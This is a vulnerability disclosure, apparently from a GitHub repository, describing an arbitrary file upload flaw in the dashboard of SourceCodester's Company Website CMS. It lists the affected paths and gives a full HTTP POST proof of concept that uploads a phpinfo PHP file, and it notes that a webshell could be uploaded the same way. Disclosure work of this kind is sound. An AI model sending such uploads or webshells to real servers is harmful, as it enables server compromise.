Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Company Website CMS Dashboard Exists Arbitrary File Upload

Company Website CMS Released by SourceCodester Has Arbitrary File Upload Vulnerability

Each file upload page in the background allows arbitrary file uploads. After the attacker enters the background, he can upload a webshell to control the server.

Arbitrary file upload vulnerability exists in the following access paths

/dashboard/createblog
/dashboard/createservice
/dashboard/createportfolio
/dashboard/createslide
/dashboard/newtestimony
/dashboard/logo

The following is the corresponding file path

/dashboard/add-blog.php
/dashboard/add-portfolio.php
/dashboard/add-service.php
/dashboard/add-slider.php
/dashboard/add-testimony.php
/dashboard/add-user.php
/dashboard/editblog.php
/dashboard/editport.php
/dashboard/editservice.php
/dashboard/edituser.php
/dashboard/section-title.php
/dashboard/site-settings.php
/dashboard/static-home.php
/dashboard/updatecontact.php
/dashboard/updatelogo.php

Take /dashboard/logo as an example

http://xxxx/dashboard/logo

image-20220806192347786

image-20220806192512556

POST /vogue/dashboard/logo HTTP/1.1
Host: 192.168.11.154
Content-Length: 483
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.11.154
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAyj41gZ8wBTnV1FL
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.11.154/vogue/dashboard/logo
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=50tlte4hmi0glidrcg38mvpflk
Connection: close

------WebKitFormBoundaryAyj41gZ8wBTnV1FL
Content-Disposition: form-data; name="xfile"; filename="phpinfo.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
------WebKitFormBoundaryAyj41gZ8wBTnV1FL
Content-Disposition: form-data; name="ufile"; filename="phpinfo.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
------WebKitFormBoundaryAyj41gZ8wBTnV1FL
Content-Disposition: form-data; name="save"


------WebKitFormBoundaryAyj41gZ8wBTnV1FL--

The upload path can be seen in the response

image-20220806192610183

Access this path

image-20220806192937588

Vulnerable code

image-20220806193354210

Upload the file directly without any filtering

Link

https://www.sourcecodester.com/php/15517/company-website-cms-php.html